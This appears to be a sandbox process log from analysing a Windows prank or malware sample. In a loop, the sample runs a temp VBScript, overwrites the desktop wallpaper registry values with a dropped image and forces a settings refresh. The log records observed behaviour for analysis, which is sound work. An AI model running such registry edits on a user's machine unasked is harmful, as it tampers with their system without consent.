C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

